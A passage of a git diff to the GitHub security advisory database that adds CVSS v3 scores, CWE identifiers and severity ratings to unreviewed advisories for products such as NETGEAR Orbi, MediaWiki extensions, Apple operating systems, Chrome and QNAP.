"CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/01/GHSA-jvf4-gm9f-33g9/GHSA-jvf4-gm9f-33g9.json b/advisories/unreviewed/2026/01/GHSA-jvf4-gm9f-33g9/GHSA-jvf4-gm9f-33g9.json index 09429ec6599e5..ccfbe4fc2ace5 100644 --- a/advisories/unreviewed/2026/01/GHSA-jvf4-gm9f-33g9/GHSA-jvf4-gm9f-33g9.json +++ b/advisories/unreviewed/2026/01/GHSA-jvf4-gm9f-33g9/GHSA-jvf4-gm9f-33g9.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-jvf4-gm9f-33g9", - "modified": "2026-01-13T18:31:07Z", + "modified": "2026-02-12T18:30:19Z", "published": "2026-01-13T18:31:07Z", "aliases": [ "CVE-2026-0404" ], "details": "An insufficient input validation vulnerability in NETGEAR Orbi devices' \nDHCPv6 functionality allows network adjacent attackers authenticated \nover WiFi or on LAN to execute OS command injections on the router. \nDHCPv6 is not enabled by default.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:N/R:U/V:D/RE:M/U:Amber" diff --git a/advisories/unreviewed/2026/01/GHSA-mrvc-5w25-h6c4/GHSA-mrvc-5w25-h6c4.json b/advisories/unreviewed/2026/01/GHSA-mrvc-5w25-h6c4/GHSA-mrvc-5w25-h6c4.json index 1bd812caed760..083d142923064 100644 --- a/advisories/unreviewed/2026/01/GHSA-mrvc-5w25-h6c4/GHSA-mrvc-5w25-h6c4.json +++ b/advisories/unreviewed/2026/01/GHSA-mrvc-5w25-h6c4/GHSA-mrvc-5w25-h6c4.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mrvc-5w25-h6c4", - "modified": "2026-01-09T00:30:28Z", + "modified": "2026-02-12T18:30:19Z", "published": "2026-01-09T00:30:28Z", "aliases": [ "CVE-2026-22712" ], "details": "Improper Encoding or Escaping of Output due to magic word replacement in ParserAfterTidy vulnerability in The Wikimedia Foundation Mediawiki - ApprovedRevs Extension allows Input Data Manipulation.This issue affects Mediawiki - ApprovedRevs Extension: 1.45, 1.44, 1.43, 1.39.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/01/GHSA-wfx5-6vpf-vmpx/GHSA-wfx5-6vpf-vmpx.json b/advisories/unreviewed/2026/01/GHSA-wfx5-6vpf-vmpx/GHSA-wfx5-6vpf-vmpx.json index c0aa5a4e701df..09a85062b06ab 100644 --- a/advisories/unreviewed/2026/01/GHSA-wfx5-6vpf-vmpx/GHSA-wfx5-6vpf-vmpx.json +++ b/advisories/unreviewed/2026/01/GHSA-wfx5-6vpf-vmpx/GHSA-wfx5-6vpf-vmpx.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-wfx5-6vpf-vmpx", - "modified": "2026-01-09T00:30:28Z", + "modified": "2026-02-12T18:30:19Z", "published": "2026-01-09T00:30:28Z", "aliases": [ "CVE-2026-22710" ], "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in The Wikimedia Foundation Mediawiki - Wikibase Extension allows Cross-Site Scripting (XSS).This issue affects Mediawiki - Wikibase Extension: 1.45, 1.44, 1.43, 1.39.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-2cmj-fc9r-6h5j/GHSA-2cmj-fc9r-6h5j.json b/advisories/unreviewed/2026/02/GHSA-2cmj-fc9r-6h5j/GHSA-2cmj-fc9r-6h5j.json index 496b47a6645b6..858c3aa931fff 100644 --- a/advisories/unreviewed/2026/02/GHSA-2cmj-fc9r-6h5j/GHSA-2cmj-fc9r-6h5j.json +++ b/advisories/unreviewed/2026/02/GHSA-2cmj-fc9r-6h5j/GHSA-2cmj-fc9r-6h5j.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2cmj-fc9r-6h5j", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2025-46300" ], "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:02Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2hr4-372m-m24q/GHSA-2hr4-372m-m24q.json b/advisories/unreviewed/2026/02/GHSA-2hr4-372m-m24q/GHSA-2hr4-372m-m24q.json index 6dd95336adb96..d11e6d8dde4dd 100644 --- a/advisories/unreviewed/2026/02/GHSA-2hr4-372m-m24q/GHSA-2hr4-372m-m24q.json +++ b/advisories/unreviewed/2026/02/GHSA-2hr4-372m-m24q/GHSA-2hr4-372m-m24q.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2hr4-372m-m24q", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20626" ], "details": "This issue was addressed with improved checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 26.3 and iPadOS 26.3, macOS Tahoe 26.3, visionOS 26.3. A malicious app may be able to gain root privileges.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -32,8 +37,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-862" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2jp6-x3f3-3m72/GHSA-2jp6-x3f3-3m72.json b/advisories/unreviewed/2026/02/GHSA-2jp6-x3f3-3m72/GHSA-2jp6-x3f3-3m72.json index 0223616481a06..2449741950492 100644 --- a/advisories/unreviewed/2026/02/GHSA-2jp6-x3f3-3m72/GHSA-2jp6-x3f3-3m72.json +++ b/advisories/unreviewed/2026/02/GHSA-2jp6-x3f3-3m72/GHSA-2jp6-x3f3-3m72.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2jp6-x3f3-3m72", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T18:30:23Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20667" ], "details": "A logic issue was addressed with improved checks. This issue is fixed in watchOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 26.3 and iPadOS 26.3. An app may be able to break out of its sandbox.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -37,7 +42,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2jw9-xm3m-75jh/GHSA-2jw9-xm3m-75jh.json b/advisories/unreviewed/2026/02/GHSA-2jw9-xm3m-75jh/GHSA-2jw9-xm3m-75jh.json index c2c0ed33da7f4..2c305f6e7029d 100644 --- a/advisories/unreviewed/2026/02/GHSA-2jw9-xm3m-75jh/GHSA-2jw9-xm3m-75jh.json +++ b/advisories/unreviewed/2026/02/GHSA-2jw9-xm3m-75jh/GHSA-2jw9-xm3m-75jh.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2jw9-xm3m-75jh", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2025-46305" ], "details": "The issue was addressed with improved bounds checks. This issue is fixed in macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, macOS Sonoma 14.8.4. A malicious HID device may cause an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:03Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2prw-jcj2-h5xf/GHSA-2prw-jcj2-h5xf.json b/advisories/unreviewed/2026/02/GHSA-2prw-jcj2-h5xf/GHSA-2prw-jcj2-h5xf.json index 05f51ee8a6dd9..356ef4749ddb7 100644 --- a/advisories/unreviewed/2026/02/GHSA-2prw-jcj2-h5xf/GHSA-2prw-jcj2-h5xf.json +++ b/advisories/unreviewed/2026/02/GHSA-2prw-jcj2-h5xf/GHSA-2prw-jcj2-h5xf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-2prw-jcj2-h5xf", - "modified": "2026-02-11T21:30:40Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2026-2318" ], "details": "Inappropriate implementation in PictureInPicture in Google Chrome prior to 145.0.7632.45 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Medium)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-451" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T19:15:51Z" diff --git a/advisories/unreviewed/2026/02/GHSA-2x8h-ggxv-ww4j/GHSA-2x8h-ggxv-ww4j.json b/advisories/unreviewed/2026/02/GHSA-2x8h-ggxv-ww4j/GHSA-2x8h-ggxv-ww4j.json index 080299e2166bc..df27885d00cbd 100644 --- a/advisories/unreviewed/2026/02/GHSA-2x8h-ggxv-ww4j/GHSA-2x8h-ggxv-ww4j.json +++ b/advisories/unreviewed/2026/02/GHSA-2x8h-ggxv-ww4j/GHSA-2x8h-ggxv-ww4j.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-2x8h-ggxv-ww4j", - "modified": "2026-02-05T18:30:32Z", + "modified": "2026-02-12T18:30:20Z", "published": "2026-02-05T18:30:32Z", "aliases": [ "CVE-2025-15557" ], "details": "An Improper Certificate Validation vulnerability in TP-Link Tapo H100 v1 and Tapo P100 v1 allows an on-path attacker on the same network segment to intercept and modify encrypted device-cloud communications.  This may compromise the confidentiality and integrity of device-to-cloud communication, enabling manipulation of device data or operations.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:P/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json b/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json index 43e504843be1b..03e6600219958 100644 --- a/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json +++ b/advisories/unreviewed/2026/02/GHSA-355c-f243-w6f5/GHSA-355c-f243-w6f5.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-355c-f243-w6f5", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T18:30:23Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20669" ], "details": "A parsing issue in the handling of directory paths was addressed with improved path validation. This issue is fixed in macOS Tahoe 26.3. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -21,7 +26,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-377q-fc84-7fvf/GHSA-377q-fc84-7fvf.json b/advisories/unreviewed/2026/02/GHSA-377q-fc84-7fvf/GHSA-377q-fc84-7fvf.json index be58c09d93750..3c97b03bed88d 100644 --- a/advisories/unreviewed/2026/02/GHSA-377q-fc84-7fvf/GHSA-377q-fc84-7fvf.json +++ b/advisories/unreviewed/2026/02/GHSA-377q-fc84-7fvf/GHSA-377q-fc84-7fvf.json @@ -50,7 +50,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-74" + "CWE-74", + "CWE-77" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2026/02/GHSA-3fcr-xq7p-rffp/GHSA-3fcr-xq7p-rffp.json b/advisories/unreviewed/2026/02/GHSA-3fcr-xq7p-rffp/GHSA-3fcr-xq7p-rffp.json index b14895c53e16e..3bcbbcc98b440 100644 --- a/advisories/unreviewed/2026/02/GHSA-3fcr-xq7p-rffp/GHSA-3fcr-xq7p-rffp.json +++ b/advisories/unreviewed/2026/02/GHSA-3fcr-xq7p-rffp/GHSA-3fcr-xq7p-rffp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3fcr-xq7p-rffp", - "modified": "2026-02-12T00:31:03Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-12T00:31:03Z", "aliases": [ "CVE-2024-50617" ], "details": "Vulnerabilities in the File Download and Get File handler components in CIPPlanner CIPAce before 9.17 allow attackers to download unauthorized files. An authenticated user can easily change the file id parameter or pass the physical file path in the URL query string to retrieve the files. (Retrieval is not intended without correct data access configured for documents.)", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-285" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T22:15:49Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json b/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json index 3399a40c08ba8..6987564cf8676 100644 --- a/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json +++ b/advisories/unreviewed/2026/02/GHSA-3qr2-wf7p-c9f8/GHSA-3qr2-wf7p-c9f8.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3qr2-wf7p-c9f8", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T18:30:23Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20671" ], "details": "A logic issue was addressed with improved checks. This issue is fixed in watchOS 26.3, tvOS 26.3, macOS Tahoe 26.3, macOS Sonoma 14.8.4, macOS Sequoia 15.7.4, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3. An attacker in a privileged network position may be able to intercept network traffic.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -49,7 +54,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3rgq-74p3-8xc5/GHSA-3rgq-74p3-8xc5.json b/advisories/unreviewed/2026/02/GHSA-3rgq-74p3-8xc5/GHSA-3rgq-74p3-8xc5.json index 495b676285564..c6e524b8036d9 100644 --- a/advisories/unreviewed/2026/02/GHSA-3rgq-74p3-8xc5/GHSA-3rgq-74p3-8xc5.json +++ b/advisories/unreviewed/2026/02/GHSA-3rgq-74p3-8xc5/GHSA-3rgq-74p3-8xc5.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3rgq-74p3-8xc5", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-58466" ], "details": "A use of uninitialized variable vulnerability has been reported to affect several QNAP operating system versions. If a remote attacker gains an administrator account, they can then exploit the vulnerability to denial of service conditions, or modify control flow in unexpected ways.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.8.3332 build 20251128 and later\nQuTS hero h5.2.8.3321 build 20251117 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-3wh2-2wc5-f45w/GHSA-3wh2-2wc5-f45w.json b/advisories/unreviewed/2026/02/GHSA-3wh2-2wc5-f45w/GHSA-3wh2-2wc5-f45w.json index 8c38cffe52a2b..465faf4994834 100644 --- a/advisories/unreviewed/2026/02/GHSA-3wh2-2wc5-f45w/GHSA-3wh2-2wc5-f45w.json +++ b/advisories/unreviewed/2026/02/GHSA-3wh2-2wc5-f45w/GHSA-3wh2-2wc5-f45w.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-3wh2-2wc5-f45w", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-66277" ], "details": "A link following vulnerability has been reported to affect several QNAP operating system versions. The remote attackers can then exploit the vulnerability to traverse the file system to unintended locations.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.2.8.3350 build 20251216 and later\nQuTS hero h5.3.2.3354 build 20251225 and later\nQuTS hero h5.2.8.3350 build 20251216 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-3ww4-528c-xcv7/GHSA-3ww4-528c-xcv7.json b/advisories/unreviewed/2026/02/GHSA-3ww4-528c-xcv7/GHSA-3ww4-528c-xcv7.json index ea4d2fc54dead..ac511b195a382 100644 --- a/advisories/unreviewed/2026/02/GHSA-3ww4-528c-xcv7/GHSA-3ww4-528c-xcv7.json +++ b/advisories/unreviewed/2026/02/GHSA-3ww4-528c-xcv7/GHSA-3ww4-528c-xcv7.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-3ww4-528c-xcv7", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20630" ], "details": "A permissions issue was addressed with additional restrictions. This issue is fixed in macOS Tahoe 26.3. An app may be able to access protected user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-277" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-3x5q-gxp5-wv27/GHSA-3x5q-gxp5-wv27.json b/advisories/unreviewed/2026/02/GHSA-3x5q-gxp5-wv27/GHSA-3x5q-gxp5-wv27.json index acfe777ec4dbf..1c2ced53ef696 100644 --- a/advisories/unreviewed/2026/02/GHSA-3x5q-gxp5-wv27/GHSA-3x5q-gxp5-wv27.json +++ b/advisories/unreviewed/2026/02/GHSA-3x5q-gxp5-wv27/GHSA-3x5q-gxp5-wv27.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-3x5q-gxp5-wv27", - "modified": "2026-02-11T15:30:27Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T15:30:27Z", "aliases": [ "CVE-2026-2249" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2249" }, + { + "type": "WEB", + "url": "https://cydome.io/vulnerability-advisory-cve-2026-2249-unauthenticated-rce-in-metis-data-fusion-server-dfs" + }, { "type": "WEB", "url": "https://www.metis.tech" diff --git a/advisories/unreviewed/2026/02/GHSA-4gx8-h22x-pf65/GHSA-4gx8-h22x-pf65.json b/advisories/unreviewed/2026/02/GHSA-4gx8-h22x-pf65/GHSA-4gx8-h22x-pf65.json index 1a2ea3633e18d..3f8f1f1381dc3 100644 --- a/advisories/unreviewed/2026/02/GHSA-4gx8-h22x-pf65/GHSA-4gx8-h22x-pf65.json +++ b/advisories/unreviewed/2026/02/GHSA-4gx8-h22x-pf65/GHSA-4gx8-h22x-pf65.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-4gx8-h22x-pf65", - "modified": "2026-02-12T12:31:00Z", + "modified": "2026-02-12T18:30:23Z", "published": "2026-02-12T12:31:00Z", "aliases": [ "CVE-2025-15575" ], "details": "The firmware update functionality does not verify the authenticity of the supplied firmware update files. This allows attackers to flash malicious firmware update files on the device. Initial analysis of the firmware update functionality does not show any cryptographic checks (e.g. digital signature checks) on the supplied firmware update files. Furthermore, ESP32 security features such as secure boot are not used.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -23,7 +28,7 @@ "cwe_ids": [ "CWE-494" ], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T11:15:49Z" diff --git a/advisories/unreviewed/2026/02/GHSA-649p-9q32-vwxc/GHSA-649p-9q32-vwxc.json b/advisories/unreviewed/2026/02/GHSA-649p-9q32-vwxc/GHSA-649p-9q32-vwxc.json index 2534b75a42087..a67de317c9bff 100644 --- a/advisories/unreviewed/2026/02/GHSA-649p-9q32-vwxc/GHSA-649p-9q32-vwxc.json +++ b/advisories/unreviewed/2026/02/GHSA-649p-9q32-vwxc/GHSA-649p-9q32-vwxc.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-649p-9q32-vwxc", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T18:30:22Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20647" ], "details": "This issue was addressed with improved data protection. This issue is fixed in macOS Tahoe 26.3. An app may be able to access sensitive user data.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-6r9h-3c6p-4chm/GHSA-6r9h-3c6p-4chm.json b/advisories/unreviewed/2026/02/GHSA-6r9h-3c6p-4chm/GHSA-6r9h-3c6p-4chm.json index 107d11d52d918..a33453f0fbf8e 100644 --- a/advisories/unreviewed/2026/02/GHSA-6r9h-3c6p-4chm/GHSA-6r9h-3c6p-4chm.json +++ b/advisories/unreviewed/2026/02/GHSA-6r9h-3c6p-4chm/GHSA-6r9h-3c6p-4chm.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6r9h-3c6p-4chm", - "modified": "2026-02-11T21:30:39Z", + "modified": "2026-02-12T18:30:21Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-69871" ], "details": "A race condition vulnerability exists in MedusaJS Medusa v2.12.2 and earlier in the registerUsage() function of the promotion module. The function performs a non-atomic read-check-update operation when enforcing promotion usage limits. This allows unauthenticated remote attackers to bypass usage limits by sending concurrent checkout requests, resulting in unlimited redemptions of limited-use promotional codes and potential financial loss.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-362" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T19:15:50Z" diff --git a/advisories/unreviewed/2026/02/GHSA-7688-cfp6-gj62/GHSA-7688-cfp6-gj62.json b/advisories/unreviewed/2026/02/GHSA-7688-cfp6-gj62/GHSA-7688-cfp6-gj62.json index be0b670945eea..8104aa19b5db6 100644 --- a/advisories/unreviewed/2026/02/GHSA-7688-cfp6-gj62/GHSA-7688-cfp6-gj62.json +++ b/advisories/unreviewed/2026/02/GHSA-7688-cfp6-gj62/GHSA-7688-cfp6-gj62.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-7688-cfp6-gj62", - "modified": "2026-02-05T21:32:42Z", + "modified": "2026-02-12T18:30:20Z", "published": "2026-02-05T21:32:42Z", "aliases": [ "CVE-2025-12131" ], "details": "A truncated 802.15.4 packet can lead to an assert, resulting in a denial of service.", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" @@ -26,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - 